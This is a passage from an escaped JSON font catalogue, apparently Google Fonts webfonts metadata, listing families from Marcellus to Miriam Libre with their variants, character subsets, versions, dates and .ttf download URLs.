\"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/marcellus/v13/wEO_EBrOk8hQLDvIAF8FUfAL3EsHiA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Marcellus SC\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/marcellussc/v13/ke8iOgUHP1dg-Rmi6RWjbLEPgdydGKikhA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Marck Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/marckscript/v16/nwpTtK2oNgBA3Or78gapdwuCzyI-aMPF7Q.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Margarine\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/margarine/v21/qkBXXvoE6trLT9Y7YLye5JRLkAXbMQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Marhey\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/marhey/v3/x3d8ck7Laq-T7wl7mqfVrEe9sDvtBZVwO2cXiGevOMw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/marhey/v3/x3d8ck7Laq-T7wl7mqfVrEe9sDvtBctwO2cXiGevOMw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/marhey/v3/x3d8ck7Laq-T7wl7mqfVrEe9sDvtBflwO2cXiGevOMw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/marhey/v3/x3d8ck7Laq-T7wl7mqfVrEe9sDvtBRV3O2cXiGevOMw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/marhey/v3/x3d8ck7Laq-T7wl7mqfVrEe9sDvtBSx3O2cXiGevOMw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Markazi Text\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/markazitext/v22/sykh-ydym6AtQaiEtX7yhqb_rV1k_81ZVYYZtfSQT4MlBekmJLo.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/markazitext/v22/sykh-ydym6AtQaiEtX7yhqb_rV1k_81ZVYYZtcaQT4MlBekmJLo.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/markazitext/v22/sykh-ydym6AtQaiEtX7yhqb_rV1k_81ZVYYZtSqXT4MlBekmJLo.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/markazitext/v22/sykh-ydym6AtQaiEtX7yhqb_rV1k_81ZVYYZtROXT4MlBekmJLo.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Marko One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/markoone/v22/9Btq3DFG0cnVM5lw1haaKpUfrHPzUw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Marmelad\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/marmelad/v17/Qw3eZQdSHj_jK2e-8tFLG-YMC0R8.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Martel\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/martel/v10/PN_yRfK9oXHga0XVqekahRbX9vnDzw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/martel/v10/PN_yRfK9oXHga0XVzeoahRbX9vnDzw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/martel/v10/PN_xRfK9oXHga0XtYcI-jT3L_w.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/martel/v10/PN_yRfK9oXHga0XVuewahRbX9vnDzw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/martel/v10/PN_yRfK9oXHga0XV3e0ahRbX9vnDzw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/martel/v10/PN_yRfK9oXHga0XVwe4ahRbX9vnDzw.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/martel/v10/PN_yRfK9oXHga0XV5e8ahRbX9vnDzw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Martel Sans\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/martelsans/v12/h0GxssGi7VdzDgKjM-4d8hAX5suHFUknqMxQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/martelsans/v12/h0GxssGi7VdzDgKjM-4d8hBz5cuHFUknqMxQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/martelsans/v12/h0GsssGi7VdzDgKjM-4d8ijfze-PPlUu.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/martelsans/v12/h0GxssGi7VdzDgKjM-4d8hAH48uHFUknqMxQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/martelsans/v12/h0GxssGi7VdzDgKjM-4d8hBj4suHFUknqMxQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/martelsans/v12/h0GxssGi7VdzDgKjM-4d8hB_4cuHFUknqMxQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/martelsans/v12/h0GxssGi7VdzDgKjM-4d8hBb4MuHFUknqMxQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Martian Mono\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/martianmono/v1/2V08KIcADoYhV6w87xrTKjs4CYElh_VS9YA4TlTnQzaVMIE6j15dYY1qus6WD75kdpF2.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/martianmono/v1/2V08KIcADoYhV6w87xrTKjs4CYElh_VS9YA4TlTnQzaVMIE6j15dYY3qu86WD75kdpF2.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/martianmono/v1/2V08KIcADoYhV6w87xrTKjs4CYElh_VS9YA4TlTnQzaVMIE6j15dYY00u86WD75kdpF2.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/martianmono/v1/2V08KIcADoYhV6w87xrTKjs4CYElh_VS9YA4TlTnQzaVMIE6j15dYY1qu86WD75kdpF2.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/martianmono/v1/2V08KIcADoYhV6w87xrTKjs4CYElh_VS9YA4TlTnQzaVMIE6j15dYY1Yu86WD75kdpF2.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/martianmono/v1/2V08KIcADoYhV6w87xrTKjs4CYElh_VS9YA4TlTnQzaVMIE6j15dYY20vM6WD75kdpF2.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/martianmono/v1/2V08KIcADoYhV6w87xrTKjs4CYElh_VS9YA4TlTnQzaVMIE6j15dYY2NvM6WD75kdpF2.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/martianmono/v1/2V08KIcADoYhV6w87xrTKjs4CYElh_VS9YA4TlTnQzaVMIE6j15dYY3qvM6WD75kdpF2.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Marvel\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/marvel/v14/nwpVtKeoNgBV0qaIkV7ED366zg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/marvel/v14/nwpXtKeoNgBV0qa4k1TALXuqzhA7.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/marvel/v14/nwpWtKeoNgBV0qawLXHgB1WmxwkiYQ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/marvel/v14/nwpQtKeoNgBV0qa4k2x8Al-i5QwyYdrc.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mate\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mate/v14/m8JdjftRd7WZ2z28WoXSaLU.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/mate/v14/m8JTjftRd7WZ6z-2XqfXeLVdbw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mate SC\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/matesc/v21/-nF8OGQ1-uoVr2wKyiXZ95OkJwA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Maven Pro\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v32\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mavenpro/v32/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8SX25nCpozp5GvU.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/mavenpro/v32/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8Rf25nCpozp5GvU.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/mavenpro/v32/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8fvx5nCpozp5GvU.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/mavenpro/v32/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8cLx5nCpozp5GvU.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/mavenpro/v32/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8aXx5nCpozp5GvU.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/mavenpro/v32/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8Yzx5nCpozp5GvU.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"McLaren\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mclaren/v13/2EbnL-ZuAXFqZFXISYYf8z2Yt_c.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mea Culpa\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/meaculpa/v3/AMOTz4GcuWbEIuza8jsZms0QW3mqyg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Meddon\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/meddon/v20/kmK8ZqA2EgDNeHTZhBdB3y_Aow.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"MedievalSharp\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/medievalsharp/v24/EvOJzAlL3oU5AQl2mP5KdgptAq96MwvXLDk.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Medula One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/medulaone/v19/YA9Wr0qb5kjJM6l2V0yukiEqs7GtlvY.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Meera Inimai\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"tamil\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/meerainimai/v12/845fNMM5EIqOW5MPuvO3ILep_2jDVevnLQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Megrim\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/megrim/v16/46kulbz5WjvLqJZlbWXgd0RY1g.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Meie Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/meiescript/v21/_LOImzDK7erRjhunIspaMjxn5IXg0WDz.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Meow Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/meowscript/v5/0FlQVPqanlaJrtr8AnJ0ESch0_0CfDf1.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Merienda\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/merienda/v17/gNMaW3x8Qoy5_mf8uUkJGHtiYXjmKFy5JHhoSU78QGBV0A.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/merienda/v17/gNMaW3x8Qoy5_mf8uUkJGHtiYXjmKFy5enhoSU78QGBV0A.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/merienda/v17/gNMaW3x8Qoy5_mf8uUkJGHtiYXjmKFy5SHhoSU78QGBV0A.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/merienda/v17/gNMaW3x8Qoy5_mf8uUkJGHtiYXjmKFy5pH9oSU78QGBV0A.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/merienda/v17/gNMaW3x8Qoy5_mf8uUkJGHtiYXjmKFy5nX9oSU78QGBV0A.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/merienda/v17/gNMaW3x8Qoy5_mf8uUkJGHtiYXjmKFy5-n9oSU78QGBV0A.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/merienda/v17/gNMaW3x8Qoy5_mf8uUkJGHtiYXjmKFy5039oSU78QGBV0A.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Merienda One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/meriendaone/v16/H4cgBXaMndbflEq6kyZ1ht6YgoyyYzFzFw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Merriweather\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v30\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/merriweather/v30/u-4n0qyriQwlOrhSvowK_l521wRpX837pvjxPA.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/merriweather/v30/u-4l0qyriQwlOrhSvowK_l5-eR7lXcf_hP3hPGWH.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/merriweather/v30/u-440qyriQwlOrhSvowK_l5OeyxNV-bnrw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/merriweather/v30/u-4m0qyriQwlOrhSvowK_l5-eSZJdeP3r-Ho.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/merriweather/v30/u-4n0qyriQwlOrhSvowK_l52xwNpX837pvjxPA.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/merriweather/v30/u-4l0qyriQwlOrhSvowK_l5-eR71Wsf_hP3hPGWH.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/merriweather/v30/u-4n0qyriQwlOrhSvowK_l52_wFpX837pvjxPA.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/merriweather/v30/u-4l0qyriQwlOrhSvowK_l5-eR7NWMf_hP3hPGWH.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Merriweather Sans\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/merriweathersans/v22/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZ_O4ljuEG7xFHnQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/merriweathersans/v22/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZou4ljuEG7xFHnQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/merriweathersans/v22/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZkO4ljuEG7xFHnQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/merriweathersans/v22/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZfOkljuEG7xFHnQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/merriweathersans/v22/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZRekljuEG7xFHnQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/merriweathersans/v22/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZIukljuEG7xFHnQ.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/merriweathersans/v22/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq2TzesCzRRXnaur.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/merriweathersans/v22/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq3NzesCzRRXnaur.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/merriweathersans/v22/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq3_zesCzRRXnaur.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/merriweathersans/v22/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq0TyusCzRRXnaur.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/merriweathersans/v22/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq0qyusCzRRXnaur.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/merriweathersans/v22/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq1NyusCzRRXnaur.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Metal\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v28\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/metal/v28/lW-wwjUJIXTo7i3nnoQAUdN2.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Metal Mania\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/metalmania/v22/RWmMoKWb4e8kqMfBUdPFJeXCg6UKDXlq.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Metamorphous\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/metamorphous/v18/Wnz8HA03aAXcC39ZEX5y1330PCCthTsmaQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Metrophobic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/metrophobic/v19/sJoA3LZUhMSAPV_u0qwiAT-J737FPEEL.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Michroma\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/michroma/v16/PN_zRfy9qWD8fEagAMg6rzjb_-Da.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Milonga\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/milonga/v20/SZc53FHnIaK9W5kffz3GkUrS8DI.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Miltonian\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/miltonian/v26/zOL-4pbPn6Ne9JqTg9mr6e5As-FeiQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Miltonian Tattoo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v28\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/miltoniantattoo/v28/EvOUzBRL0o0kCxF-lcMCQxlpVsA_FwP8MDBku-s.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mina\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"bengali\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mina/v11/-nFzOGc18vARrz9j7i3y65o.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/mina/v11/-nF8OGc18vARl4NMyiXZ95OkJwA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mingzat\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"lepcha\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mingzat/v2/0QIgMX5C-o-oWWyvBttkm_mv670.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Miniver\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/miniver/v21/eLGcP-PxIg-5H0vC770Cy8r8fWA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Miriam Libre\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"hebrew\",\n        